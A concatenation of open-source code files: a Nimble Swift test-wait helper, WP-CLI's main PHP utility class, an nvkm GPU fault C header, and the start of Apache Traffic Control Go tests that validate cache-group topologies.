case .incomplete: internalError("Reached .incomplete state for waitUntil(...).")
case .blockedRunLoop:
fail(blockedRunLoopErrorMessageFor("-waitUntil()", leeway: leeway),
file: file, line: line)
case .timedOut:
let pluralize = (timeout == 1 ? "" : "s")
fail("Waited more than \(timeout) second\(pluralize)", file: file, line: line)
case let .raisedException(exception):
fail("Unexpected exception raised: \(exception)")
case let .errorThrown(error):
fail("Unexpected error thrown: \(error)")
case .completed(.exception(let exception)):
fail("Unexpected exception raised: \(exception)")
case .completed(.error(let error)):
fail("Unexpected error thrown: \(error)")
case .completed(.none): // success
break
}
}
@objc(untilFile:line:action:)
internal class func until(_ file: FileString = #file, line: UInt = #line, action: @escaping (() -> Void) -> Void) -> Void {
until(timeout: 1, file: file, line: line, action: action)
}
}
internal func blockedRunLoopErrorMessageFor(_ fnName: String, leeway: TimeInterval) -> String {
return "\(fnName) timed out but was unable to run the timeout handler because the main thread is unresponsive (\(leeway) seconds is allow after the wait times out). Conditions that may cause this include processing blocking IO on the main thread, calls to sleep(), deadlocks, and synchronous IPC. Nimble forcefully stopped run loop which may cause future failures in test run."
}
/// Wait asynchronously until the done closure is called or the timeout has been reached.
///
/// @discussion
/// Call the done() closure to indicate the waiting has completed.
///
/// This function manages the main run loop (`NSRunLoop.mainRunLoop()`) while this function
/// is executing. Any attempts to touch the run loop may cause non-deterministic behavior.
public func waitUntil(timeout: TimeInterval = 1, file: FileString = #file, line: UInt = #line, action: @escaping (@escaping () -> Void) -> Void) -> Void {
NMBWait.until(timeout: timeout, file: file, line: line, action: action)
}
#endif
| {
"pile_set_name": "Github"
} |
<?php
use \WP_CLI\Utils;
use \WP_CLI\Dispatcher;
use \WP_CLI\FileCache;
use \WP_CLI\Process;
use \WP_CLI\WpHttpCacheManager;
/**
* Various utilities for WP-CLI commands.
*/
class WP_CLI {
private static $configurator;
private static $logger;
private static $hooks = array(), $hooks_passed = array();
/**
* Set the logger instance.
*
* @param object $logger
*/
public static function set_logger( $logger ) {
self::$logger = $logger;
}
/**
* Get the Configurator instance
*
* @return \WP_CLI\Configurator
*/
public static function get_configurator() {
static $configurator;
if ( !$configurator ) {
$configurator = new WP_CLI\Configurator( WP_CLI_ROOT . '/php/config-spec.php' );
}
return $configurator;
}
public static function get_root_command() {
static $root;
if ( !$root ) {
$root = new Dispatcher\RootCommand;
}
return $root;
}
public static function get_runner() {
static $runner;
if ( !$runner ) {
$runner = new WP_CLI\Runner;
}
return $runner;
}
/**
* @return FileCache
*/
public static function get_cache() {
static $cache;
if ( !$cache ) {
$home = getenv( 'HOME' );
if ( !$home ) {
// sometime in windows $HOME is not defined
$home = getenv( 'HOMEDRIVE' ) . getenv( 'HOMEPATH' );
}
$dir = getenv( 'WP_CLI_CACHE_DIR' ) ? : "$home/.wp-cli/cache";
// 6 months, 300mb
$cache = new FileCache( $dir, 15552000, 314572800 );
// clean older files on shutdown with 1/50 probability
if ( 0 === mt_rand( 0, 50 ) ) {
register_shutdown_function( function () use ( $cache ) {
$cache->clean();
} );
}
}
return $cache;
}
/**
* Set the context in which WP-CLI should be run
*/
public static function set_url( $url ) {
WP_CLI::debug( 'Set URL: ' . $url, 'bootstrap' );
$url_parts = Utils\parse_url( $url );
self::set_url_params( $url_parts );
}
private static function set_url_params( $url_parts ) {
$f = function( $key ) use ( $url_parts ) {
return \WP_CLI\Utils\get_flag_value( $url_parts, $key, '' );
};
if ( isset( $url_parts['host'] ) ) {
if ( isset( $url_parts['scheme'] ) && 'https' === strtolower( $url_parts['scheme'] ) ) {
$_SERVER['HTTPS'] = 'on';
}
$_SERVER['HTTP_HOST'] = $url_parts['host'];
if ( isset( $url_parts['port'] ) ) {
$_SERVER['HTTP_HOST'] .= ':' . $url_parts['port'];
}
$_SERVER['SERVER_NAME'] = $url_parts['host'];
}
$_SERVER['REQUEST_URI'] = $f('path') . ( isset( $url_parts['query'] ) ? '?' . $url_parts['query'] : '' );
$_SERVER['SERVER_PORT'] = \WP_CLI\Utils\get_flag_value( $url_parts, 'port', '80' );
$_SERVER['QUERY_STRING'] = $f('query');
}
/**
* @return WpHttpCacheManager
*/
public static function get_http_cache_manager() {
static $http_cacher;
if ( !$http_cacher ) {
$http_cacher = new WpHttpCacheManager( self::get_cache() );
}
return $http_cacher;
}
/**
* Colorize a string for output.
*
* Yes, you too can change the color of command line text. For instance,
* here's how `WP_CLI::success()` colorizes "Success: "
*
* ```
* WP_CLI::colorize( "%GSuccess:%n " )
* ```
*
* Uses `\cli\Colors::colorize()` to transform color tokens to display
* settings. Choose from the following tokens (and note 'reset'):
*
* * %y => ['color' => 'yellow'],
* * %g => ['color' => 'green'],
* * %b => ['color' => 'blue'],
* * %r => ['color' => 'red'],
* * %p => ['color' => 'magenta'],
* * %m => ['color' => 'magenta'],
* * %c => ['color' => 'cyan'],
* * %w => ['color' => 'grey'],
* * %k => ['color' => 'black'],
* * %n => ['color' => 'reset'],
* * %Y => ['color' => 'yellow', 'style' => 'bright'],
* * %G => ['color' => 'green', 'style' => 'bright'],
* * %B => ['color' => 'blue', 'style' => 'bright'],
* * %R => ['color' => 'red', 'style' => 'bright'],
* * %P => ['color' => 'magenta', 'style' => 'bright'],
* * %M => ['color' => 'magenta', 'style' => 'bright'],
* * %C => ['color' => 'cyan', 'style' => 'bright'],
* * %W => ['color' => 'grey', 'style' => 'bright'],
* * %K => ['color' => 'black', 'style' => 'bright'],
* * %N => ['color' => 'reset', 'style' => 'bright'],
* * %3 => ['background' => 'yellow'],
* * %2 => ['background' => 'green'],
* * %4 => ['background' => 'blue'],
* * %1 => ['background' => 'red'],
* * %5 => ['background' => 'magenta'],
* * %6 => ['background' => 'cyan'],
* * %7 => ['background' => 'grey'],
* * %0 => ['background' => 'black'],
* * %F => ['style' => 'blink'],
* * %U => ['style' => 'underline'],
* * %8 => ['style' => 'inverse'],
* * %9 => ['style' => 'bright'],
* * %_ => ['style' => 'bright')
*
* @access public
* @category Output
*
* @param string $string String to colorize for output, with color tokens.
* @return string Colorized string.
*/
public static function colorize( $string ) {
return \cli\Colors::colorize( $string, self::get_runner()->in_color() );
}
/**
* Schedule a callback to be executed at a certain point.
*
* Hooks conceptually are very similar to WordPress actions. WP-CLI hooks
* are typically called before WordPress is loaded.
*
* WP-CLI hooks include:
*
* * `before_invoke:<command>` - Just before a command is invoked.
* * `after_invoke:<command>` - Just after a command is involved.
* * `before_wp_load` - Just before the WP load process begins.
* * `before_wp_config_load` - After wp-config.php has been located.
* * `after_wp_config_load` - After wp-config.php has been loaded into scope.
* * `after_wp_load` - Just after the WP load process has completed.
*
* WP-CLI commands can create their own hooks with `WP_CLI::do_hook()`.
*
* ```
* # `wp network meta` confirms command is executing in multisite context.
* WP_CLI::add_command( 'network meta', 'Network_Meta_Command', array(
* 'before_invoke' => function () {
* if ( !is_multisite() ) {
* WP_CLI::error( 'This is not a multisite install.' );
* }
* }
* ) );
* ```
*
* @access public
* @category Registration
*
* @param string $when Identifier for the hook.
* @param mixed $callback Callback to execute when hook is called.
* @return null
*/
public static function add_hook( $when, $callback ) {
if ( in_array( $when, self::$hooks_passed ) )
call_user_func( $callback );
self::$hooks[ $when ][] = $callback;
}
/**
* Execute callbacks registered to a given hook.
*
* See `WP_CLI::add_hook()` for details on WP-CLI's internal hook system.
* Commands can provide and call their own hooks.
*
* @access public
* @category Registration
*
* @param string $when Identifier for the hook.
* @return null
*/
public static function do_hook( $when ) {
self::$hooks_passed[] = $when;
if ( !isset( self::$hooks[ $when ] ) ) {
return;
}
foreach ( self::$hooks[ $when ] as $callback ) {
if ( func_num_args() > 1 ) {
$args = array_slice( func_get_args(), 1 );
call_user_func_array( $callback, $args );
} else {
call_user_func( $callback );
}
}
}
/**
* Add a callback to a WordPress action or filter.
*
* `add_action()` without needing access to `add_action()`. If WordPress is
* already loaded though, you should use `add_action()` (and `add_filter()`)
* instead.
*
* @access public
* @category Registration
*
* @param string $tag Named WordPress action or filter.
* @param mixed $function_to_add Callable to execute when the action or filter is evaluated.
* @param integer $priority Priority to add the callback as.
* @param integer $accepted_args Number of arguments to pass to callback.
* @return true
*/
public static function add_wp_hook( $tag, $function_to_add, $priority = 10, $accepted_args = 1 ) {
global $wp_filter, $merged_filters;
if ( function_exists( 'add_filter' ) ) {
add_filter( $tag, $function_to_add, $priority, $accepted_args );
} else {
$idx = self::wp_hook_build_unique_id( $tag, $function_to_add, $priority );
$wp_filter[$tag][$priority][$idx] = array('function' => $function_to_add, 'accepted_args' => $accepted_args);
unset( $merged_filters[ $tag ] );
}
return true;
}
/**
* Build Unique ID for storage and retrieval.
*
* Essentially _wp_filter_build_unique_id() without needing access to _wp_filter_build_unique_id()
*/
private static function wp_hook_build_unique_id( $tag, $function, $priority ) {
global $wp_filter;
static $filter_id_count = 0;
if ( is_string($function) )
return $function;
if ( is_object($function) ) {
// Closures are currently implemented as objects
$function = array( $function, '' );
} else {
$function = (array) $function;
}
if (is_object($function[0]) ) {
// Object Class Calling
if ( function_exists('spl_object_hash') ) {
return spl_object_hash($function[0]) . $function[1];
} else {
$obj_idx = get_class($function[0]).$function[1];
if ( !isset($function[0]->wp_filter_id) ) {
if ( false === $priority )
return false;
$obj_idx .= isset($wp_filter[$tag][$priority]) ? count((array)$wp_filter[$tag][$priority]) : $filter_id_count;
$function[0]->wp_filter_id = $filter_id_count;
++$filter_id_count;
} else {
$obj_idx .= $function[0]->wp_filter_id;
}
return $obj_idx;
}
} elseif ( is_string( $function[0] ) ) {
// Static Calling
return $function[0] . '::' . $function[1];
}
}
/**
* Register a command to WP-CLI.
*
* WP-CLI supports using any callable class, function, or closure as a
* command. `WP_CLI::add_command()` is used for both internal and
* third-party command registration.
*
* Command arguments are parsed from PHPDoc by default, but also can be
* supplied as an optional third argument during registration.
*
* ```
* # Register a custom 'foo' command to output a supplied positional param.
* #
* # $ wp foo bar
* # Success: bar
*
* /**
* * My awesome closure command
* *
* * <message>
* * : An awesome message to display
* *
* * @when before_wp_load
* *\/
* $foo = function( $args ) {
* WP_CLI::success( $args[0] );
* };
* WP_CLI::add_command( 'foo', $foo );
* ```
*
* @access public
* @category Registration
*
* @param string $name Name for the command (e.g. "post list" or "site empty").
* @param string $callable Command implementation as a class, function or closure.
* @param array $args {
* Optional An associative array with additional registration parameters.
* 'before_invoke' => callback to execute before invoking the command,
* 'after_invoke' => callback to execute after invoking the command,
* 'shortdesc' => short description (80 char or less) for the command,
* 'synopsis' => the synopsis for the command (string or array),
* 'when' => execute callback on a named WP-CLI hook (e.g. before_wp_load),
* }
* @return true True on success, hard error if registration failed.
*/
public static function add_command( $name, $callable, $args = array() ) {
$valid = false;
if ( is_callable( $callable ) ) {
$valid = true;
} else if ( is_string( $callable ) && class_exists( (string) $callable ) ) {
$valid = true;
} else if ( is_object( $callable ) ) {
$valid = true;
}
if ( ! $valid ) {
if ( is_array( $callable ) ) {
$callable[0] = is_object( $callable[0] ) ? get_class( $callable[0] ) : $callable[0];
$callable = array( $callable[0], $callable[1] );
}
WP_CLI::error( sprintf( "Callable %s does not exist, and cannot be registered as `wp %s`.", json_encode( $callable ), $name ) );
}
foreach( array( 'before_invoke', 'after_invoke' ) as $when ) {
if ( isset( $args[ $when ] ) ) {
self::add_hook( "{$when}:{$name}", $args[ $when ] );
}
}
$path = preg_split( '/\s+/', $name );
$leaf_name = array_pop( $path );
$full_path = $path;
$command = self::get_root_command();
while ( !empty( $path ) ) {
$subcommand_name = $path[0];
$subcommand = $command->find_subcommand( $path );
// create an empty container
if ( !$subcommand ) {
$subcommand = new Dispatcher\CompositeCommand( $command, $subcommand_name,
new \WP_CLI\DocParser( '' ) );
$command->add_subcommand( $subcommand_name, $subcommand );
}
$command = $subcommand;
}
$leaf_command = Dispatcher\CommandFactory::create( $leaf_name, $callable, $command );
if ( ! $command->can_have_subcommands() ) {
throw new Exception( sprintf( "'%s' can't have subcommands.",
implode( ' ' , Dispatcher\get_path( $command ) ) ) );
}
if ( isset( $args['shortdesc'] ) ) {
$leaf_command->set_shortdesc( $args['shortdesc'] );
}
if ( isset( $args['synopsis'] ) ) {
if ( is_string( $args['synopsis'] ) ) {
$leaf_command->set_synopsis( $args['synopsis'] );
} else if ( is_array( $args['synopsis'] ) ) {
$synopsis = \WP_CLI\SynopsisParser::render( $args['synopsis'] );
$leaf_command->set_synopsis( $synopsis );
$long_desc = '';
$bits = explode( ' ', $synopsis );
foreach( $args['synopsis'] as $key => $arg ) {
$long_desc .= $bits[ $key ] . PHP_EOL;
if ( ! empty( $arg['description'] ) ) {
$long_desc .= ': ' . $arg['description'] . PHP_EOL;
}
$yamlify = array();
foreach( array( 'default', 'options' ) as $key ) {
if ( isset( $arg[ $key ] ) ) {
$yamlify[ $key ] = $arg[ $key ];
}
}
if ( ! empty( $yamlify ) ) {
$long_desc .= \Spyc::YAMLDump( $yamlify );
$long_desc .= '---' . PHP_EOL;
}
$long_desc .= PHP_EOL;
}
if ( ! empty( $long_desc ) ) {
$long_desc = rtrim( $long_desc, PHP_EOL );
$long_desc = '## OPTIONS' . PHP_EOL . PHP_EOL . $long_desc;
$leaf_command->set_longdesc( $long_desc );
}
}
}
if ( isset( $args['when'] ) ) {
self::get_runner()->register_early_invoke( $args['when'], $leaf_command );
}
$command->add_subcommand( $leaf_name, $leaf_command );
return true;
}
/**
* Display informational message without prefix, and ignore `--quiet`.
*
* Message is written to STDOUT. `WP_CLI::log()` is typically recommended;
* `WP_CLI::line()` is included for historical compat.
*
* @access public
* @category Output
*
* @param string $message Message to display to the end user.
* @return null
*/
public static function line( $message = '' ) {
echo $message . "\n";
}
/**
* Display informational message without prefix.
*
* Message is written to STDOUT, or discarded when `--quiet` flag is supplied.
*
* ```
* # `wp cli update` lets user know of each step in the update process.
* WP_CLI::log( sprintf( 'Downloading from %s...', $download_url ) );
* ```
*
* @access public
* @category Output
*
* @param string $message Message to write to STDOUT.
*/
public static function log( $message ) {
self::$logger->info( $message );
}
/**
* Display success message prefixed with "Success: ".
*
* Success message is written to STDOUT.
*
* Typically recommended to inform user of successful script conclusion.
*
* ```
* # wp rewrite flush expects 'rewrite_rules' option to be set after flush.
* flush_rewrite_rules( \WP_CLI\Utils\get_flag_value( $assoc_args, 'hard' ) );
* if ( ! get_option( 'rewrite_rules' ) ) {
* WP_CLI::warning( "Rewrite rules are empty." );
* } else {
* WP_CLI::success( 'Rewrite rules flushed.' );
* }
* ```
*
* @access public
* @category Output
*
* @param string $message Message to write to STDOUT.
* @return null
*/
public static function success( $message ) {
self::$logger->success( $message );
}
/**
* Display debug message prefixed with "Debug: " when `--debug` is used.
*
* Debug message is written to STDERR, and includes script execution time.
*
* Helpful for optionally showing greater detail when needed. Used throughout
* WP-CLI bootstrap process for easier debugging and profiling.
*
* ```
* # Called in `WP_CLI\Runner::set_wp_root()`.
* private static function set_wp_root( $path ) {
* define( 'ABSPATH', rtrim( $path, '/' ) . '/' );
* WP_CLI::debug( 'ABSPATH defined: ' . ABSPATH );
* $_SERVER['DOCUMENT_ROOT'] = realpath( $path );
* }
*
* # Debug details only appear when `--debug` is used.
* # $ wp --debug
* # [...]
* # Debug: ABSPATH defined: /srv/www/wordpress-develop.dev/src/ (0.225s)
* ```
*
* @access public
* @category Output
*
* @param string $message Message to write to STDERR.
* @param string $group Organize debug message to a specific group.
* @return null
*/
public static function debug( $message, $group = false ) {
self::$logger->debug( self::error_to_string( $message ), $group );
}
/**
* Display warning message prefixed with "Warning: ".
*
* Warning message is written to STDERR.
*
* Use instead of `WP_CLI::debug()` when script execution should be permitted
* to continue.
*
* ```
* # `wp plugin activate` skips activation when plugin is network active.
* $status = $this->get_status( $plugin->file );
* // Network-active is the highest level of activation status
* if ( 'active-network' === $status ) {
* WP_CLI::warning( "Plugin '{$plugin->name}' is already network active." );
* continue;
* }
* ```
*
* @access public
* @category Output
*
* @param string $message Message to write to STDERR.
* @return null
*/
public static function warning( $message ) {
self::$logger->warning( self::error_to_string( $message ) );
}
/**
* Display error message prefixed with "Error: " and exit script.
*
* Error message is written to STDERR. Defaults to halting script execution
* with return code 1.
*
* Use `WP_CLI::warning()` instead when script execution should be permitted
* to continue.
*
* ```
* # `wp cache flush` considers flush failure to be a fatal error.
* if ( false === wp_cache_flush() ) {
* WP_CLI::error( 'The object cache could not be flushed.' );
* }
* ```
*
* @access public
* @category Output
*
* @param string|WP_Error $message Message to write to STDERR.
* @param boolean|integer $exit True defaults to exit(1).
* @return null
*/
public static function error( $message, $exit = true ) {
if ( ! isset( self::get_runner()->assoc_args[ 'completions' ] ) ) {
self::$logger->error( self::error_to_string( $message ) );
}
if ( true === $exit ) {
exit( 1 );
} elseif ( is_int( $exit ) && $exit >= 1 ) {
exit( $exit );
}
}
/**
* Display a multi-line error message in a red box. Doesn't exit script.
*
* Error message is written to STDERR.
*
* @access public
* @category Output
*
* @param array $message Multi-line error message to be displayed.
*/
public static function error_multi_line( $message_lines ) {
if ( ! isset( self::get_runner()->assoc_args[ 'completions' ] ) && is_array( $message_lines ) ) {
self::$logger->error_multi_line( array_map( array( __CLASS__, 'error_to_string' ), $message_lines ) );
}
}
/**
* Ask for confirmation before running a destructive operation.
*
* If 'y' is provided to the question, the script execution continues. If
* 'n' or any other response is provided to the question, script exits.
*
* ```
* # `wp db drop` asks for confirmation before dropping the database.
*
* WP_CLI::confirm( "Are you sure you want to drop the database?", $assoc_args );
* ```
*
* @access public
* @category Input
*
* @param string $question Question to display before the prompt.
* @param array $assoc_args Skips prompt if 'yes' is provided.
*/
public static function confirm( $question, $assoc_args = array() ) {
if ( ! \WP_CLI\Utils\get_flag_value( $assoc_args, 'yes' ) ) {
fwrite( STDOUT, $question . " [y/n] " );
$answer = strtolower( trim( fgets( STDIN ) ) );
if ( 'y' != $answer )
exit;
}
}
/**
* Read value from a positional argument or from STDIN.
*
* @param array $args The list of positional arguments.
* @param int $index At which position to check for the value.
*
* @return string
*/
public static function get_value_from_arg_or_stdin( $args, $index ) {
if ( isset( $args[ $index ] ) ) {
$raw_value = $args[ $index ];
} else {
// We don't use file_get_contents() here because it doesn't handle
// Ctrl-D properly, when typing in the value interactively.
$raw_value = '';
while ( ( $line = fgets( STDIN ) ) !== false ) {
$raw_value .= $line;
}
}
return $raw_value;
}
/**
* Read a value, from various formats.
*
* @access public
* @category Input
*
* @param mixed $value
* @param array $assoc_args
*/
public static function read_value( $raw_value, $assoc_args = array() ) {
if ( \WP_CLI\Utils\get_flag_value( $assoc_args, 'format' ) === 'json' ) {
$value = json_decode( $raw_value, true );
if ( null === $value ) {
WP_CLI::error( sprintf( 'Invalid JSON: %s', $raw_value ) );
}
} else {
$value = $raw_value;
}
return $value;
}
/**
* Display a value, in various formats
*
* @param mixed $value Value to display.
* @param array $assoc_args Arguments passed to the command, determining format.
*/
public static function print_value( $value, $assoc_args = array() ) {
if ( \WP_CLI\Utils\get_flag_value( $assoc_args, 'format' ) === 'json' ) {
$value = json_encode( $value );
} elseif ( \WP_CLI\Utils\get_flag_value( $assoc_args, 'format' ) === 'yaml' ) {
$value = Spyc::YAMLDump( $value, 2, 0 );
} elseif ( is_array( $value ) || is_object( $value ) ) {
$value = var_export( $value );
}
echo $value . "\n";
}
/**
* Convert a wp_error into a string
*
* @param mixed $errors
* @return string
*/
public static function error_to_string( $errors ) {
if ( is_string( $errors ) ) {
return $errors;
}
if ( is_object( $errors ) && is_a( $errors, 'WP_Error' ) ) {
foreach ( $errors->get_error_messages() as $message ) {
if ( $errors->get_error_data() ) {
return $message . ' ' . json_encode( $errors->get_error_data() );
} else {
return $message;
}
}
}
}
/**
* Launch an arbitrary external process that takes over I/O.
*
* ```
* # `wp core download` falls back to the `tar` binary when PharData isn't available
* if ( ! class_exists( 'PharData' ) ) {
* $cmd = "tar xz --strip-components=1 --directory=%s -f $tarball";
* WP_CLI::launch( Utils\esc_cmd( $cmd, $dest ) );
* return;
* }
* ```
*
* @access public
* @category Execution
*
* @param string $command External process to launch.
* @param boolean $exit_on_error Whether to exit if the command returns an elevated return code.
* @param boolean $return_detailed Whether to return an exit status (default) or detailed execution results.
* @return int|ProcessRun The command exit status, or a ProcessRun object for full details.
*/
public static function launch( $command, $exit_on_error = true, $return_detailed = false ) {
$proc = Process::create( $command );
$results = $proc->run();
if ( -1 == $results->return_code ) {
self::warning( "Spawned process returned exit code {$results->return_code}, which could be caused by a custom compiled version of PHP that uses the --enable-sigchild option." );
}
if ( $results->return_code && $exit_on_error )
exit( $results->return_code );
if ( $return_detailed ) {
return $results;
} else {
return $results->return_code;
}
}
/**
* Run a WP-CLI command in a new process reusing the current runtime arguments.
*
* Note: While this command does persist a limited set of runtime arguments,
* it *does not* persist environment variables. Practically speaking, WP-CLI
* packages won't be loaded when using WP_CLI::launch_self() because the
* launched process doesn't have access to the current process $HOME.
*
* @access public
* @category Execution
*
* @param string $command WP-CLI command to call.
* @param array $args Positional arguments to include when calling the command.
* @param array $assoc_args Associative arguments to include when calling the command.
* @param bool $exit_on_error Whether to exit if the command returns an elevated return code.
* @param bool $return_detailed Whether to return an exit status (default) or detailed execution results.
* @param array $runtime_args Override one or more global args (path,url,user,allow-root)
* @return int|ProcessRun The command exit status, or a ProcessRun instance
*/
public static function launch_self( $command, $args = array(), $assoc_args = array(), $exit_on_error = true, $return_detailed = false, $runtime_args = array() ) {
$reused_runtime_args = array(
'path',
'url',
'user',
'allow-root',
);
foreach ( $reused_runtime_args as $key ) {
if ( isset( $runtime_args[ $key ] ) ) {
$assoc_args[ $key ] = $runtime_args[ $key ];
} else if ( $value = self::get_runner()->config[ $key ] )
$assoc_args[ $key ] = $value;
}
$php_bin = self::get_php_binary();
$script_path = $GLOBALS['argv'][0];
if ( getenv( 'WP_CLI_CONFIG_PATH' ) ) {
$config_path = getenv( 'WP_CLI_CONFIG_PATH' );
} else {
$config_path = getenv( 'HOME' ) . '/.wp-cli/config.yml';
}
$config_path = escapeshellarg( $config_path );
$args = implode( ' ', array_map( 'escapeshellarg', $args ) );
$assoc_args = \WP_CLI\Utils\assoc_args_to_str( $assoc_args );
$full_command = "WP_CLI_CONFIG_PATH={$config_path} {$php_bin} {$script_path} {$command} {$args} {$assoc_args}";
return self::launch( $full_command, $exit_on_error, $return_detailed );
}
/**
* Get the path to the PHP binary used when executing WP-CLI.
*
* Environment values permit specific binaries to be indicated.
*
* @access public
* @category System
*
* @return string
*/
public static function get_php_binary() {
if ( defined( 'PHP_BINARY' ) )
return PHP_BINARY;
if ( getenv( 'WP_CLI_PHP_USED' ) )
return getenv( 'WP_CLI_PHP_USED' );
if ( getenv( 'WP_CLI_PHP' ) )
return getenv( 'WP_CLI_PHP' );
return 'php';
}
/**
* Get values of global configuration parameters.
*
* Provides access to `--path=<path>`, `--url=<url>`, and other values of
* the [global configuration parameters](https://wp-cli.org/config/).
*
* ```
* WP_CLI::log( 'The --url=<url> value is: ' . WP_CLI::get_config( 'url' ) );
* ```
*
* @access public
* @category Input
*
* @param string $key Get value for a specific global configuration parameter.
* @return mixed
*/
public static function get_config( $key = null ) {
if ( null === $key ) {
return self::get_runner()->config;
}
if ( !isset( self::get_runner()->config[ $key ] ) ) {
self::warning( "Unknown config option '$key'." );
return null;
}
return self::get_runner()->config[ $key ];
}
/**
* Run a given command within the current process using the same global
* parameters.
*
* To run a command using a new process with the same global parameters,
* use WP_CLI::launch_self(). To run a command using a new process with
* different global parameters, use WP_CLI::launch().
*
* ```
* ob_start();
* WP_CLI::run_command( array( 'cli', 'cmd-dump' ) );
* $ret = ob_get_clean();
* ```
*
* @access public
* @category Execution
*
* @param array $args Positional arguments including command name.
* @param array $assoc_args
*/
public static function run_command( $args, $assoc_args = array() ) {
self::get_runner()->run_command( $args, $assoc_args );
}
// DEPRECATED STUFF
public static function add_man_dir() {
trigger_error( 'WP_CLI::add_man_dir() is deprecated. Add docs inline.', E_USER_WARNING );
}
// back-compat
public static function out( $str ) {
fwrite( STDOUT, $str );
}
// back-compat
public static function addCommand( $name, $class ) {
trigger_error( sprintf( 'wp %s: %s is deprecated. use WP_CLI::add_command() instead.',
$name, __FUNCTION__ ), E_USER_WARNING );
self::add_command( $name, $class );
}
}
| {
"pile_set_name": "Github"
} |
#ifndef __NVKM_FAULT_H__
#define __NVKM_FAULT_H__
#include <core/subdev.h>
#include <core/notify.h>
struct nvkm_fault {
const struct nvkm_fault_func *func;
struct nvkm_subdev subdev;
struct nvkm_fault_buffer *buffer[2];
int buffer_nr;
struct nvkm_event event;
struct nvkm_notify nrpfb;
struct nvkm_device_oclass user;
};
struct nvkm_fault_data {
u64 addr;
u64 inst;
u64 time;
u8 engine;
u8 valid;
u8 gpc;
u8 hub;
u8 access;
u8 client;
u8 reason;
};
int gp100_fault_new(struct nvkm_device *, int, struct nvkm_fault **);
int gp10b_fault_new(struct nvkm_device *, int, struct nvkm_fault **);
int gv100_fault_new(struct nvkm_device *, int, struct nvkm_fault **);
int tu102_fault_new(struct nvkm_device *, int, struct nvkm_fault **);
#endif
| {
"pile_set_name": "Github"
} |
package v3
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
import (
"fmt"
"github.com/apache/trafficcontrol/lib/go-tc"
"reflect"
"strings"
"testing"
)
type topologyTestCase struct {
testCaseDescription string
tc.Topology
}
func TestTopologies(t *testing.T) {
WithObjs(t, []TCObj{Types, CacheGroups, Topologies}, func() {
UpdateTestTopologies(t)
ValidationTestTopologies(t)
EdgeParentOfEdgeSucceedsWithWarning(t)
})
}
func CreateTestTopologies(t *testing.T) {
var (
postResponse *tc.TopologyResponse
err error
)
for _, topology := range testData.Topologies {
if postResponse, _, err = TOSession.CreateTopology(topology); err != nil {
t.Fatalf("could not CREATE topology: %v", err)
}
postResponse.Response.LastUpdated = nil
if !reflect.DeepEqual(topology, postResponse.Response) {
t.Fatalf("Topology in response should be the same as the one POSTed. expected: %v\nactual: %v", topology, postResponse.Response)
}
t.Log("Response: ", postResponse)
}
}
func EdgeParentOfEdgeSucceedsWithWarning(t *testing.T) {
testCase := topologyTestCase{testCaseDescription: "an edge parenting a mid", Topology: tc.Topology{
Name: "edge-parent-of-edge",
Description: "An edge is a parent, which is technically valid, but we will warn the user in case it was a mistake",
Nodes: []tc.TopologyNode{
{Cachegroup: "cachegroup1", Parents: []int{1}},
{Cachegroup: "cachegroup2", Parents: []int{}},
}}}
response, _, err := TOSession.CreateTopology(testCase.Topology)
if err != nil {
t.Fatalf("expected POST with %v to succeed, actual: nil", testCase.testCaseDescription)
}
containsWarning := false
for _, alert := range response.Alerts.Alerts {
if alert.Level == "warning" {
containsWarning = true
}
}
if !containsWarning {
t.Fatalf("expected a warning-level alert message in the response, actual: %v", response.Alerts)
}
delResp, _, err := TOSession.DeleteTopology(testCase.Topology.Name)
if err != nil {
t.Fatalf("cannot DELETE topology: %v - %v", err, delResp)
}
}
func ValidationTestTopologies(t *testing.T) {
invalidTopologyTestCases := []topologyTestCase{
{testCaseDescription: "no nodes", Topology: tc.Topology{Name: "empty-top", Description: "Invalid because there are no nodes", Nodes: []tc.TopologyNode{}}},
{testCaseDescription: "a node listing itself as a parent", Topology: tc.Topology{Name: "self-parent", Description: "Invalid because a node lists itself as a parent", Nodes: []tc.TopologyNode{
{Cachegroup: "cachegroup1", Parents: []int{1}},
{Cachegroup: "parentCachegroup", Parents: []int{1}},
}}},
{testCaseDescription: "duplicate parents", Topology: tc.Topology{}},
{testCaseDescription: "too many parents", Topology: tc.Topology{Name: "duplicate-parents", Description: "Invalid because a node lists the same parent twice", Nodes: []tc.TopologyNode{
{Cachegroup: "cachegroup1", Parents: []int{1, 1}},
{Cachegroup: "parentCachegroup", Parents: []int{}},
}}},
{testCaseDescription: "too many parents", Topology: tc.Topology{Name: "too-many-parents", Description: "Invalid because a node has more than 2 parents", Nodes: []tc.TopologyNode{
{Cachegroup: "parentCachegroup", Parents: []int{}},
{Cachegroup: "secondaryCachegroup", Parents: []int{}},
{Cachegroup: "parentCachegroup2", Parents: []int{}},
{Cachegroup: "cachegroup1", Parents: []int{0, 1, 2}},
}}},
{testCaseDescription: "an edge parenting a mid", Topology: tc.Topology{Name: "edge-parent-of-mid", Description: "Invalid because an edge is a parent of a mid", Nodes: []tc.TopologyNode{
{Cachegroup: "cachegroup1", Parents: []int{1}},
{Cachegroup: "parentCachegroup", Parents: []int{2}},
{Cachegroup: "cachegroup2", Parents: []int{}},
}}},
{testCaseDescription: "a leaf mid", Topology: tc.Topology{Name: "leaf-mid", Description: "Invalid because a mid is a leaf node", Nodes: []tc.TopologyNode{
{Cachegroup: "parentCachegroup", Parents: []int{1}},
{Cachegroup: "secondaryCachegroup", Parents: []int{}},
}}},
{testCaseDescription: "cyclical nodes", Topology: tc.Topology{Name: "cyclical-nodes", Description: "Invalid because it contains cycles", Nodes: []tc.TopologyNode{
{Cachegroup: "cachegroup1", Parents: []int{1, 2}},
{Cachegroup: "parentCachegroup", Parents: []int{2}},
{Cachegroup: "secondaryCachegroup", Parents: []int{1}},
}}},
{testCaseDescription: "a cycle across topologies", Topology: tc.Topology{Name: "cycle-with-4-tier-topology", Description: `Invalid because it contains a cycle when combined with the "4-tiers" topology`, Nodes: []tc.TopologyNode{
{Cachegroup: "parentCachegroup", Parents: []int{1}},
{Cachegroup: "parentCachegroup2", Parents: []int{}},
